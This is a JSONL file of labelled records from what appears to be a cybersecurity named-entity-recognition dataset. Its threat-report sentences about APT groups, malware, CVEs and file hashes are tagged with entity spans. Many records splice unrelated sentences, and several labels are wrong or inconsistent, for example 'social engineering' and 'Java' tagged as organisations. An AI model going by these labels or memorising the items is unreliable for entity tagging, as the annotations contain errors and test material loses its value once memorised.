{"text": "A backdoor also known as: Exploit.SWF.AW Exploit.SWF.AW Exploit.PDF.SWF.B Exploit.SWF.AW SWF/Swif.A Trojan.Pidief TROJ_PIDIEF.JYS Exploit.SWF.CVE-2011-0611.z Exploit.Swf.Cve20110611.riuyt Exploit.SWF.AW Exploit.SWF.AW Exploit.PDF.2369 TROJ_PIDIEF.JYS BehavesLike.PDF.Evasion.dx SWF/Swif.A Exploit.CVE-2011-0611.k EXP/CVE-2011-0611.K SWF/CVE_2011_0611.Z!exploit Exploit.SWF.AW Exploit:SWF/ShellCode.B PDF/CVE-2010-1297.B!exploit Exploit.SWF.AW Win32.Exploit.Cve-2011-0611.Hupz Exploit.SWF.CVE-2011-0611 Exploit.SWF.AW Exploit_c.UDJ heur.swf.rateIII.66", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001651", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Mdropper TROJ_CVE201711882.SM1 Exploit.OleNative.CVE-2017-11882.evenbv TROJ_CVE201711882.SM1 Exploit:O97M/CVE-2017-11882.A Exploit.CVE-2017-11882 Win32/Trojan.Exploit.fa4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001652", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.ZomJoiner!O TrojanDropper.ZomJoiner Dropper.ZomJoiner.Win32.52 Trojan/Dropper.ZomJoiner.b Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Virus.EGNS-9078 Trojan.Dropper Win.Trojan.Aavirus-2 Trojan-Dropper.Win32.ZomJoiner.b Trojan.Win32.ZomJoiner.ejxy W32.W.Mabezat.l5Eq Trojan.MulDrop.18385 BehavesLike.Win32.Mydoom.zm Trojan-Dropper.Win32.ZomJoiner TrojanDropper.ZomJoiner.b Trojan[Dropper]/Win32.ZomJoiner Trojan.Win32.Z.Zomjoiner.9384 Trojan-Dropper.Win32.ZomJoiner.b TrojanDropper.ZomJoiner Trojan.DR.ZomJoiner!x9m8v+yJIQc W32/Zjoin.DN!tr Win32/Trojan.2ff", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001653", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TrojanPSW.Zbot.C3 Trojan.Injector.Win32.369399 TROJ_KOVTER.SMFD Win.Packer.VbPack-0-6334882-0 Trojan.Win32.Dwn.ebdmck Trojan.DownLoader19.64784 TROJ_KOVTER.SMFD TR/Dropper.VB.52936 Trojan.Zusy.D2D84A Trojan.Injector!jIvQU/lMWaU Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001654", "source": "cyner2_valid"}}
{"text": "During this time , “ Agent Smith ” hackers eventually built up a vast number of app presence on 9Apps , which later would serve as publication channels for evolved droppers .", "spans": {"Malware: Agent Smith": [[21, 32]], "System: 9Apps": [[96, 101]]}, "info": {"id": "cyner2_valid_001655", "source": "cyner2_valid"}}
{"text": "HawkEye is a commercially available crimeware tool provider that offers a variety of products that include a keylogger, malware encrypting tool and brute-forcing tool, all of which can be purchased online through their public website.", "spans": {"Malware: HawkEye": [[0, 7]], "Malware: keylogger, malware encrypting tool": [[109, 143]], "Malware: brute-forcing tool,": [[148, 167]]}, "info": {"id": "cyner2_valid_001656", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: PowerShell/NukeSped.A BKDR_RATANKBA.ZAEL-A BKDR_RATANKBA.ZAEL-A Win32/Backdoor.efa", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001658", "source": "cyner2_valid"}}
{"text": "It has several protections in place , both in the C2 and the malware 's code .", "spans": {}, "info": {"id": "cyner2_valid_001659", "source": "cyner2_valid"}}
{"text": "TYPE_VIEW_TEXT_CHANGED Represents the event of changing the text of an EditText .", "spans": {}, "info": {"id": "cyner2_valid_001660", "source": "cyner2_valid"}}
{"text": "All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers . We recently noticed the group behind MuddyWater that appear to be targeting government bodies , military entities , telcos and educational institutions in Jordan , Turkey , Azerbaijan and Pakistan , in addition to the continuous targeting of Iraq and Saudi Arabia , other victims were also detected in Mali , Austria , Russia , Iran and Bahrain. .", "spans": {"Organization: Connexxa S.R.L .": [[105, 121]], "Vulnerability: EternalBlue": [[150, 161]], "Organization: government bodies": [[324, 341]], "Organization: military entities": [[344, 361]], "Organization: educational institutions": [[375, 399]]}, "info": {"id": "cyberner_stix_valid_000000", "source": "cyberner_stix_valid"}}
{"text": "These SMS messages masquerade as a message from the local post office and link to the FakeSpy download . Towards the end of April 2019 , we tracked down what we believe to be new activity by APT10 , a Chinese cyber espionage group . In all , Kaspersky Lab discovered Metel in more than 30 financial institutions .", "spans": {"Malware: FakeSpy": [[86, 93]], "Organization: Kaspersky Lab": [[242, 255]], "Organization: financial institutions": [[289, 311]]}, "info": {"id": "cyberner_stix_valid_000001", "source": "cyberner_stix_valid"}}
{"text": "In the native library , it stores the strings to access the SMS API . While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July . ShareShell Share a shell to other . In the case of a traditional ProxyNotShell exploit chain , the attack sequence is done in two steps :", "spans": {"Vulnerability: CVE-2014-0515": [[159, 172]], "Vulnerability: Adobe Flash exploit": [[173, 192]], "Organization: Cisco TRAC": [[211, 221]]}, "info": {"id": "cyberner_stix_valid_000002", "source": "cyberner_stix_valid"}}
{"text": "This entry was posted on Tue Mar 13 12:15 EDT 2018 and filed under Yogesh Londhe , Dileep . We observed implementation of this bypass in the macro code to invoke regsvr32.exe , along with a URL passed to it which was hosting a malicious SCT file .", "spans": {"Organization: Yogesh Londhe": [[67, 80]], "Organization: Dileep": [[83, 89]], "Indicator: regsvr32.exe": [[162, 174]], "Indicator: SCT file": [[237, 245]]}, "info": {"id": "cyberner_stix_valid_000003", "source": "cyberner_stix_valid"}}
{"text": "New FakeSpy applications masquerading as post office apps . This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however , we believe APT34's strongest interest is gaining access to financial , energy , and government entities . APT38 has paralleled North Korea 's worsening financial condition .", "spans": {"Malware: FakeSpy": [[4, 11]], "Organization: financial": [[238, 247]], "Organization: energy": [[250, 256]], "Organization: government": [[263, 273]]}, "info": {"id": "cyberner_stix_valid_000004", "source": "cyberner_stix_valid"}}
{"text": "Extract the address book . Lua modules is a technique that has previously been used by Flamer . During the attacks , victims are infected with a previously undocumented backdoor , dubbed Pierogi by Cybereason . The frameworks evolving realworld tactics , techniques and procedures can help organizations better understand how to allocate resources properly to detect ransomware early enough to prevent a successful attack .", "spans": {"System: address book": [[12, 24]], "Malware: backdoor": [[169, 177]], "Malware: Pierogi": [[187, 194]], "Organization: Cybereason": [[198, 208]]}, "info": {"id": "cyberner_stix_valid_000005", "source": "cyberner_stix_valid"}}
{"text": "The fields it collects are : Mobile - The phone number which sent the SMS Content - The message body Sender - The contact name who sent the message Time - The time the message was received onReceive function used to intercept incoming SMS messages . Once the adversary established a foothold on the targeted network , they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials , perform network reconnaissance and pivot to other systems . August 2013 , FireEye gained visibility on one of 22 CnC servers used at that time by the Ke3chang attackers .", "spans": {"Organization: FireEye": [[510, 517]]}, "info": {"id": "cyberner_stix_valid_000006", "source": "cyberner_stix_valid"}}
{"text": "No instances of these apps were found in Google Play . In short , Lazarus continues to pose a serious threat to the financial sector and organizations should take all necessary steps to ensure that their payment systems are fully up to date and secured . Following these reports , Chronicle researchers doubled downon efforts to try to unravel the various campaigns where Winnti was leveraged .", "spans": {"System: Google Play": [[41, 52]], "Organization: financial sector": [[116, 132]], "Organization: Chronicle": [[281, 290]], "Malware: Winnti": [[372, 378]]}, "info": {"id": "cyberner_stix_valid_000007", "source": "cyberner_stix_valid"}}
{"text": "Further research uncovered attempts by the actor to compromise popular IoT devices ( a VOIP phone , an office printer , and a video decoder ) across multiple customer locations .", "spans": {}, "info": {"id": "cyberner_stix_valid_000008", "source": "cyberner_stix_valid"}}
{"text": "] 132:28855 GoldenCup : New Cyber Threat Targeting World Cup Fans As the World Cup launches , so does a new threat Officials from the Israeli Defense Force recently uncovered an Android Spyware campaign targeting Israeli soldiers and orchestrated by \" Hamas . APT29 has used The Onion Router and the TOR domain fronting plugin meek to create a hidden , encrypted network tunnel that appeared to connect to Google services over TLS . krab5.dll : 0f270db9ab9361e20058b8c6129bf30e d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 , Mon Oct 29 17:39:23 2018 UTC . krab5.text : 019bc7edf8c2896754fdbdbc2ddae4ec . krab5.rdata : d6ed79624f7af19ba90f51379b7f31e4 . krab5.data : 1ec7b57b01d0c46b628a991555fc90f0 . krab5.rsrc : 89b7e19270b2a5563c301b84b28e423f . krab5.reloc : 685c3c775f65bffceccc1598ff7c2e59 . passing this wide string to function with only one string This could lead to unexpected behavior it could raise access violation exception or just continue and only the first placeholder replaced .", "spans": {"Malware: GoldenCup": [[12, 21]], "Organization: Israeli Defense Force": [[134, 155]], "System: Android": [[178, 185]], "Organization: Hamas": [[252, 257]], "Organization: Google": [[406, 412]], "Indicator: krab5.dll": [[433, 442]], "Indicator: 0f270db9ab9361e20058b8c6129bf30e": [[445, 477]], "Indicator: d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525": [[478, 542]], "Indicator: krab5.text": [[576, 586]], "Indicator: 019bc7edf8c2896754fdbdbc2ddae4ec": [[589, 621]], "Indicator: krab5.rdata": [[624, 635]], "Indicator: d6ed79624f7af19ba90f51379b7f31e4": [[638, 670]], "Indicator: krab5.data": [[673, 683]], "Indicator: 1ec7b57b01d0c46b628a991555fc90f0": [[686, 718]], "Indicator: krab5.rsrc": [[721, 731]], "Indicator: 89b7e19270b2a5563c301b84b28e423f": [[734, 766]], "Indicator: krab5.reloc": [[769, 780]], "Indicator: 685c3c775f65bffceccc1598ff7c2e59": [[783, 815]]}, "info": {"id": "cyberner_stix_valid_000009", "source": "cyberner_stix_valid"}}
{"text": "Using data collected from the Lookout global sensor network , the Lookout research team was able to gain unique visibility into the ViperRAT malware , including 11 new , unreported applications . Turla 's campaign still relies on a fake Flash installer but , instead of directly dropping the two malicious DLLs , it executes a Metasploit shellcode and drops , or downloads from Google Drive , a legitimate Flash installer . Before the malware can be installed a unique name must to be generated for the service . But after being informed that Bradshaw was not subject to Canadian trademark laws , Avid Life offered to buy AshleyMadisonSucks.com for $ 10,000 .", "spans": {"Organization: Lookout": [[30, 37]], "Malware: ViperRAT": [[132, 140]], "Organization: Bradshaw": [[543, 551]], "Organization: Avid Life": [[597, 606]], "Organization: AshleyMadisonSucks.com": [[622, 644]]}, "info": {"id": "cyberner_stix_valid_000010", "source": "cyberner_stix_valid"}}
{"text": "Generic detections , advanced behavioral analytics , and machine learning technologies in Windows Defender Advanced Threat Protection detect FinFisher ’ s malicious behavior throughout the attack kill chain and alert SecOps personnel . Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying . The binary is heavily obfuscated with overlapping blocks of garbage code enclosed in pushf/popf instructions . nbtscan.exe", "spans": {"System: Windows Defender Advanced Threat Protection": [[90, 133]], "Malware: FinFisher": [[141, 150]]}, "info": {"id": "cyberner_stix_valid_000011", "source": "cyberner_stix_valid"}}
{"text": "Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign . In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool .", "spans": {"Malware: PYTHON33.dll": [[45, 57]], "Malware: inicore_v2.3.30.dll": [[70, 89]], "Organization: CTU": [[286, 289]], "Indicator: s.txt": [[326, 331]]}, "info": {"id": "cyberner_stix_valid_000012", "source": "cyberner_stix_valid"}}
{"text": "X-Agent is a signature tool of Fancy Bear operations—a cross-platform backdoor toolset with variants for Windows , MacOS , Android , and iOS .", "spans": {"Malware: X-Agent": [[0, 7]], "System: Windows": [[105, 112]], "System: MacOS": [[115, 120]], "System: Android": [[123, 130]], "System: iOS": [[137, 140]]}, "info": {"id": "cyberner_stix_valid_000013", "source": "cyberner_stix_valid"}}
{"text": "While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July . The primary goal of these attacks was likely to find code-signing certificates for signing future malware .", "spans": {"Vulnerability: CVE-2014-0515": [[89, 102]], "Vulnerability: Adobe Flash exploit": [[103, 122]], "Organization: Cisco TRAC": [[141, 151]]}, "info": {"id": "cyberner_stix_valid_000014", "source": "cyberner_stix_valid"}}
{"text": "Palo Alto Networks customers are protected from this threat by :", "spans": {"Organization: Palo Alto Networks": [[0, 18]]}, "info": {"id": "cyberner_stix_valid_000015", "source": "cyberner_stix_valid"}}
{"text": "This bootkit is not the first of this kind . After that , the attacker is capable to control the compromised device . APT intruders employ this tactic because while network firewalls are generally adept at keeping malware outside the network from initiating communication with systems inside the network , they are less reliable at keeping malware that is already inside the network from communicating to systems outside . As previously recommended , updating Windows , Java and Adobe Reader to the latest versions should provide a basic level of defense against the known Miniduke attacks .", "spans": {"Organization: Java": [[470, 474]]}, "info": {"id": "cyberner_stix_valid_000016", "source": "cyberner_stix_valid"}}
{"text": "Some possibility remains that one or more CNIIHM employees could have conducted the activity linking TEMP.Veles to CNIIHM without their employer ’s approval .", "spans": {"Organization: CNIIHM": [[42, 48], [115, 121]]}, "info": {"id": "cyberner_stix_valid_000017", "source": "cyberner_stix_valid"}}
{"text": "They don’t have any arguments , and they are quite self-explanatory .", "spans": {}, "info": {"id": "cyberner_stix_valid_000018", "source": "cyberner_stix_valid"}}
{"text": "In recent years , the Dukes have engaged in apparently biannual large-scale spear-phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations .", "spans": {}, "info": {"id": "cyberner_stix_valid_000019", "source": "cyberner_stix_valid"}}
{"text": "Once a certificate has been compromised , so has the reputation of the organization who signed it .", "spans": {}, "info": {"id": "cyberner_stix_valid_000020", "source": "cyberner_stix_valid"}}
{"text": "This time the email was made to look like an investigation report related to Jammu & Kashmir protest was shared by the Ministry of Home Affairs Official and the forwarded email was made to look like the report was forwarded by an Ambassador in Thailand Indian embassy to the MEA officials .", "spans": {"Organization: Ministry of Home Affairs": [[119, 143]], "Organization: Indian embassy": [[253, 267]], "Organization: MEA": [[275, 278]]}, "info": {"id": "cyberner_stix_valid_000021", "source": "cyberner_stix_valid"}}
{"text": "LUNAR SPIDER had already introduced BokBot to the criminal market at the time Neverquest operations ceased , suggesting that the malware change may have been planned . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": {"Vulnerability: zero-day": [[284, 292]], "Vulnerability: exploit": [[293, 300]]}, "info": {"id": "cyberner_stix_valid_000022", "source": "cyberner_stix_valid"}}
{"text": "The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . The fact that the cybercriminals behind GozNym have already adapted the Trojan for three different languages and in countries which have different banking systems is unique , according to Kessem .", "spans": {"Organization: financial services": [[81, 99]], "Organization: telecoms": [[102, 110]], "Organization: government": [[113, 123]], "Organization: defense sectors": [[130, 145]], "Malware: GozNym": [[188, 194]], "Malware: Trojan": [[220, 226]], "Organization: Kessem": [[336, 342]]}, "info": {"id": "cyberner_stix_valid_000023", "source": "cyberner_stix_valid"}}
{"text": "This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics . Japan is no stranger to banking malware .", "spans": {"Malware: malicious Word documents": [[159, 183]], "Indicator: banking": [[272, 279]], "Indicator: malware": [[280, 287]]}, "info": {"id": "cyberner_stix_valid_000024", "source": "cyberner_stix_valid"}}
{"text": "The group primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . But even though they share the use of Winnti , the BARIUM and LEAD activity groups are involved in very different intrusion scenarios .", "spans": {"Malware: Winnti": [[175, 181]], "Malware: BARIUM": [[188, 194]], "Malware: LEAD": [[199, 203]]}, "info": {"id": "cyberner_stix_valid_000025", "source": "cyberner_stix_valid"}}
{"text": "[ True/False ] Screen size List of the installed applications SMS messages saved on the device It is not uncommon for banking malware to harvest extensive amounts of data from the victim ’ s device . The group exploits known vulnerabilities in Microsoft Office products to infect their targets with malware . Our data suggests that actors have deployed the RGDoor backdoor on webservers belonging to eight Middle Eastern government organizations , as well as one financial and one educational institution .", "spans": {"Malware: RGDoor backdoor": [[357, 372]], "Organization: government organizations": [[421, 445]], "Organization: financial": [[463, 472]], "Organization: educational institution": [[481, 504]]}, "info": {"id": "cyberner_stix_valid_000026", "source": "cyberner_stix_valid"}}
{"text": "address book substituted into the message text 40 “ text ” : string Shutting down applications with specific names ( antivirus and banking applications ) The set of possible commands is the most significant difference between the various flavors of Asacub . CTU researchers have observed the Threat Group-3390 employing legitimate Kaspersky antivirus variants in analyzed samples . All results and system information collected from the infected system are stored locally in the device for a period before Outlaw retrieves them via the C&C . The first , CVE-2022 - 41123 , has been revealed by ZDI to be DLL hijacking3 due to the loading of a non - existent component by a privileged executed command .", "spans": {"System: address book": [[0, 12]], "Malware: Asacub": [[249, 255]], "Organization: CTU": [[258, 261]], "Organization: Kaspersky": [[331, 340]], "Vulnerability: CVE-2022 - 41123": [[553, 569]], "Vulnerability: DLL hijacking3": [[603, 617]]}, "info": {"id": "cyberner_stix_valid_000027", "source": "cyberner_stix_valid"}}
{"text": "Hidden Configuration Data As mentioned above , EventBot begins using obfuscation . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category . CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering .", "spans": {"Malware: EventBot": [[47, 55]], "Malware: malicious sample": [[98, 114]], "Organization: CTU": [[262, 265]], "Organization: social engineering": [[387, 405]]}, "info": {"id": "cyberner_stix_valid_000028", "source": "cyberner_stix_valid"}}
{"text": "This ' connection bouncer ' tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic . We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post .", "spans": {"Indicator: Devoted To Humanity": [[243, 262]]}, "info": {"id": "cyberner_stix_valid_000029", "source": "cyberner_stix_valid"}}
{"text": "Through an IP address whitelisting process , the threat group selectively targets visitors to these websites .", "spans": {}, "info": {"id": "cyberner_stix_valid_000030", "source": "cyberner_stix_valid"}}
{"text": "Ke3chang attackers have used spear-phishing emails . This post was our first analysis of the first Panda Banker campaign that we’ve seen to target financial institutions in Japan .", "spans": {"Indicator: Panda Banker": [[99, 111]], "Organization: financial institutions": [[147, 169]]}, "info": {"id": "cyberner_stix_valid_000031", "source": "cyberner_stix_valid"}}
{"text": "The following IP addresses are believed to have been used by the actor for command and control ( C2 ) during these intrusions :", "spans": {}, "info": {"id": "cyberner_stix_valid_000032", "source": "cyberner_stix_valid"}}
{"text": "The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes . The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies .", "spans": {"Vulnerability: CVE-2016-4117": [[68, 81]], "Organization: telecommunications companies": [[257, 285]]}, "info": {"id": "cyberner_stix_valid_000033", "source": "cyberner_stix_valid"}}
{"text": "Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit . Nearly a month later , security experts are now shining a bright light on the alert and the mysterious group behind the attack .", "spans": {"Organization: electronics": [[94, 105]], "Vulnerability: Flash Player exploit": [[132, 152]]}, "info": {"id": "cyberner_stix_valid_000034", "source": "cyberner_stix_valid"}}
{"text": "The group has been active since at least 2009 and there are signs that earlier malware versions were developed as far back as 2007 . Sensitive bank documents have be found on the servers that were controlling Carbanak .", "spans": {"Malware: Carbanak": [[209, 217]]}, "info": {"id": "cyberner_stix_valid_000035", "source": "cyberner_stix_valid"}}
{"text": "CTU researchers observed RCSession and Cobalt Strike on systems that BRONZE PRESIDENT targeted for data theft .", "spans": {"Organization: CTU": [[0, 3]], "Malware: RCSession": [[25, 34]]}, "info": {"id": "cyberner_stix_valid_000036", "source": "cyberner_stix_valid"}}
{"text": "Like EternalPetya , infpub.dat determines if a specific file exists on the system and will exit if found . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER .", "spans": {"Malware: infpub.dat": [[20, 30]], "Malware: specific file": [[47, 60]], "Vulnerability: CVE-2017-11882": [[191, 205]], "Malware: POWRUNER": [[216, 224]], "Malware: BONDUPDATER": [[229, 240]]}, "info": {"id": "cyberner_stix_valid_000037", "source": "cyberner_stix_valid"}}
{"text": "PLATINUM has developed or commissioned a number of custom tools to provide the group with access to victim resources . Since at least 2013 , Nitro appears to have somewhat modified their malware and delivery methods to include Spindest and legitimate compromised websites , as reported by Cyber Squared 's TCIRT .", "spans": {"Malware: Spindest": [[227, 235]], "Malware: legitimate compromised websites": [[240, 271]], "Organization: Cyber Squared 's TCIRT": [[289, 311]]}, "info": {"id": "cyberner_stix_valid_000038", "source": "cyberner_stix_valid"}}
{"text": "NetSess — This publicly available tool enumerates NetBIOS sessions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000039", "source": "cyberner_stix_valid"}}
{"text": "This would allow the RAT to receive system notifications . In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials . On August 25, 2014, we observed another round of spear phishing emails targeting a high-technology company in Japan . Proxy : Domain Fronting APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.007 Remote Services : Cloud Services APT29 has leveraged compromised high - privileged on - premises accounts synced to Office 365 to move laterally into a cloud environment , including through the use of Azure AD PowerShell .", "spans": {"System: Remote Services": [[416, 431]], "System: Azure AD PowerShell": [[617, 636]]}, "info": {"id": "cyberner_stix_valid_000040", "source": "cyberner_stix_valid"}}
{"text": "EventBot parsing of grabbed SMS messages Parsing of grabbed SMS messages . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . APT33 often conducts spear-phishing operations using a built-in phishing module .", "spans": {"Malware: EventBot": [[0, 8]], "Malware: Sea Turtle": [[142, 152]]}, "info": {"id": "cyberner_stix_valid_000041", "source": "cyberner_stix_valid"}}
{"text": "Vector : The delivery mechanism ; email via attacker-controlled or leased spam botnet -- Necurs for TA505 -- remains a dominant vector , and certainly the vector of choice for this actor .", "spans": {"Malware: Necurs": [[89, 95]]}, "info": {"id": "cyberner_stix_valid_000042", "source": "cyberner_stix_valid"}}
{"text": "( You can find additional IoCs at the end of this article ) As you can see , the Web page uses a similar colour scheme as , and the icon design from , a legitimate VPN application ( VPN Proxy Master ) found on the Google Play store . It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations . Splitter.exe : a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff , 1ff40e79d673461cd33bd8b68f8bb5b8 , 2017.08.06 11:32:36 (GMT), I386 Windows Console EXE . We highly suspect the “ Pig network ” to have also been used as a bulletproof hosting service for cybercriminals who are unrelated to the Winnti group .", "spans": {"System: Google Play store": [[214, 231]], "Indicator: Splitter.exe": [[512, 524]], "Indicator: a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff": [[527, 591]], "Indicator: 1ff40e79d673461cd33bd8b68f8bb5b8": [[594, 626]], "System: Windows": [[661, 668]], "System: Pig network": [[707, 718]], "System: bulletproof hosting service": [[749, 776]]}, "info": {"id": "cyberner_stix_valid_000043", "source": "cyberner_stix_valid"}}
{"text": "The malware may inject itself into browser processes and explorer.exe . BARIUM begins its attacks by cultivating relationships with potential victims—particularly those working in Business Development or Human Resources—on various social media platforms .", "spans": {"Malware: explorer.exe": [[57, 69]], "Organization: social media": [[231, 243]]}, "info": {"id": "cyberner_stix_valid_000044", "source": "cyberner_stix_valid"}}
{"text": "Explanation of ToolTo improve social engineering assessments , we developed a tool – named ReelPhish – that simplifies the real-time phishing technique . Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb .", "spans": {"Indicator: IDA Pro": [[169, 176]], "Indicator: WinDbg": [[181, 187]]}, "info": {"id": "cyberner_stix_valid_000045", "source": "cyberner_stix_valid"}}
{"text": "The implications of this study shows that certificate owners need to keep a careful eye on them to prevent them from falling into the wrong hands .", "spans": {}, "info": {"id": "cyberner_stix_valid_000046", "source": "cyberner_stix_valid"}}
{"text": "We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content .", "spans": {"Malware: decoy files": [[14, 25]], "Indicator: archive": [[148, 155]], "Vulnerability: vulnerability": [[216, 229]]}, "info": {"id": "cyberner_stix_valid_000047", "source": "cyberner_stix_valid"}}
{"text": "The group ’s primary malware is Sofacy , which has two main components .", "spans": {"Malware: Sofacy": [[32, 38]]}, "info": {"id": "cyberner_stix_valid_000048", "source": "cyberner_stix_valid"}}
{"text": "Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . The sample we analyzed was a purported message from a police inspector in Zurich allegedly claiming to unsuccessfully contact the recipient .", "spans": {"Malware: HIGHNOON": [[22, 30]]}, "info": {"id": "cyberner_stix_valid_000049", "source": "cyberner_stix_valid"}}
{"text": "Kaspersky detects and blocks samples of the ViceLeaker operation using the following verdict : Trojan-Spy.AndroidOS.ViceLeaker . Based on our analysis into the activity , ASERT deems with moderate confidence that an Indian APT group is behind the LUCKY ELEPHANT campaign . Dropper : 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273 Excel file with malicious macro .", "spans": {"Organization: Kaspersky": [[0, 9]], "Malware: ViceLeaker": [[44, 54]], "Malware: Dropper": [[273, 280]], "Indicator: 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273": [[283, 347]]}, "info": {"id": "cyberner_stix_valid_000050", "source": "cyberner_stix_valid"}}
{"text": "These decoy documents however were written before the start of the November 2013 Euromaidan protests in Ukraine and the subsequent upheaval .", "spans": {}, "info": {"id": "cyberner_stix_valid_000051", "source": "cyberner_stix_valid"}}
{"text": "Comparing encrypted vs decrypted asset file . In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics .", "spans": {"Vulnerability: CVE-2019-0604": [[121, 134]], "Organization: Cyber Security Center": [[187, 208]], "Organization: Canadian Center": [[217, 232]], "Malware: SYSCON": [[378, 384]], "Indicator: malicious Word documents": [[413, 437]]}, "info": {"id": "cyberner_stix_valid_000052", "source": "cyberner_stix_valid"}}
{"text": "It injects the next payload into the Internet Explorer process , and the tainted iexplore.exe process carries out the attacker ’s commands .", "spans": {"Indicator: iexplore.exe": [[81, 93]]}, "info": {"id": "cyberner_stix_valid_000053", "source": "cyberner_stix_valid"}}
{"text": "Officials did confirm a few days later that they were a victim of malicious cyber-attacks that prevented attendees from printing their tickets to the Games and televisions and internet access in the main press center simply stopped working .", "spans": {"Organization: Games": [[150, 155]]}, "info": {"id": "cyberner_stix_valid_000054", "source": "cyberner_stix_valid"}}
{"text": "Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February . These archives provide further indication that those entities behind the campaigns are Persian-language speakers , due to the naming of files and folders in Persian .", "spans": {"Organization: customers": [[92, 101]], "Organization: IT support firms": [[112, 128]]}, "info": {"id": "cyberner_stix_valid_000055", "source": "cyberner_stix_valid"}}
{"text": "To do this , open the displayed link on your mobile phone by typing in the URL field of your browser or scan the displayed QR code . These actors use Let's Encrypts , Comodo , Sectigo , and self-signed certificates in their MitM servers to gain the initial round of credentials . The group has targeted organizations across multiple industries in the United States , Saudi Arabia , and South Korea , with a particular interest in the aviation and energy sectors .", "spans": {}, "info": {"id": "cyberner_stix_valid_000056", "source": "cyberner_stix_valid"}}
{"text": "The legitimate app in question was a Uyghur language keyboard app targeted at native speakers of the Uyghur language and their smartphones . The link to feeds.rapidfeeds.com left in its XML configuration file was also mentioned by Kaspersky’s report in the reference section , which confirms that the APT-C-09 group keeps updating its C2 configuration channel and the recent one reserves some past features . The use of BLACKCOFFEE demonstrates APT17 's evolving use of public websites to hide in plain sight .", "spans": {"Organization: Kaspersky’s": [[231, 242]], "Malware: BLACKCOFFEE": [[420, 431]]}, "info": {"id": "cyberner_stix_valid_000057", "source": "cyberner_stix_valid"}}
